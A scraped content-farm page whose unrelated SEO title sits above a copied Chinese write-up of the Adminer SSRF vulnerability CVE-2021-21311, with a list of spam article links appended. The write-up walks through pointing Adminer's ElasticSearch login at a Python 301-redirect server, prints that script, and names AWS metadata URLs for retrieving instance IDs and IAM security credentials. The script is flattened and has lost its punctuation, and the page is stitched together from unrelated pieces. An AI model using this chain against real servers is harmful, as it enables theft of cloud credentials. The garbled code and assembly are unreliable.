当前位置: 首页 > news >正文

简要列举网站常见类型网站建设的资源整合与系统设计

简要列举网站常见类型,网站建设的资源整合与系统设计,动易网站后台管理系统,厦门外贸建站Adminer是一个PHP编写的开源数据库管理工具#xff0c;支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间#xff0c;连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞#xff08…Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF。 参考连接 https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml 1.在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写example.com点击登录即可看到example.com返回的400错误页面展示在页面中 Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com) 使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。 参考链接 SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHubhttps://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd 首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务 http://169.254.169.254/latest/meta-data/instance-id然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。 重定向请求的python脚本 #!/usr/bin/env pythonimport SimpleHTTPServer import SocketServer import sys import argparsedef redirect_handler_factory(url):Returns a request handler class that redirects to supplied urlclass RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header(Location, url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header(Location, url)self.end_headers()return RedirectHandlerdef main():parser argparse.ArgumentParser(descriptionHTTP redirect server)parser.add_argument(--port, -p, actionstore, typeint, default80, helpport to listen on)parser.add_argument(--ip, -i, actionstore, default, helphost interface to listen on)parser.add_argument(redirect_url, actionstore)myargs parser.parse_args()redirect_url myargs.redirect_urlport myargs.porthost myargs.ipredirectHandler redirect_handler_factory(redirect_url)handler SocketServer.TCPServer((host, port), redirectHandler)print(serving at port %s % port)handler.serve_forever()if __name__ __main__:main() http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
http://www.hkea.cn/news/14339157/

相关文章:

  • 网站设计公司兴田德润信任高wordpress 前台不显示
  • gta5资产网站正在建设有没有会计做兼职的网站
  • 太原网站建设策划方案降低生育
  • 有了网站开发app是不是更容易网站设计技术有哪些?
  • 服务网站欣赏长沙做网站优化
  • 国内环保行业网站开发小米发布会最新
  • 模板和网站可以分开吗洛可可设计公司老板
  • 网站建设 自查表wordpress文章宽度自适应
  • 建筑设计网站网址个人备案网站涉及企业
  • 给别人做网站被诉侵权网站推广是网站建设完成之后的长期工作。
  • 网站建设深圳给原码杭州模板网站建设
  • 影视网站设计网站网络优化服务
  • 网站电子签名怎么做西安优化网站
  • 昆明建设网站网络营销运营推广方案下载
  • 济南做网站找泉诺百度推广app下载官方
  • 网站 代理 备案 费用吗网站建设需要注意什么
  • 做爰免费视频网站微信编辑器做网站
  • 定制一个高端网站网站建设的有什么需求
  • 中山 家居 骏域网站建设专家门户手机网站开发
  • 南通网站建设招聘wordpress 插件 破解
  • 网站建设比较好的律所北京app网站建设价格
  • 扁平手机网站wordpress国主题公园
  • 布吉公司做网站简单企业网站模板免费
  • 域名年费多少网站建设有站点网络营销平台
  • 麻涌网站建设项目管理系统软件开发
  • 顺德做网站设计的公司内蒙古呼和浩特网站建设
  • 菏泽建设局网站做网站要求什么
  • 常见cms网站源码下载深圳龙华属于哪个区
  • 三亚网站运营托管介绍广州站到广州南站地铁要多久
  • 网站建设方案范本找大学生做家教的网站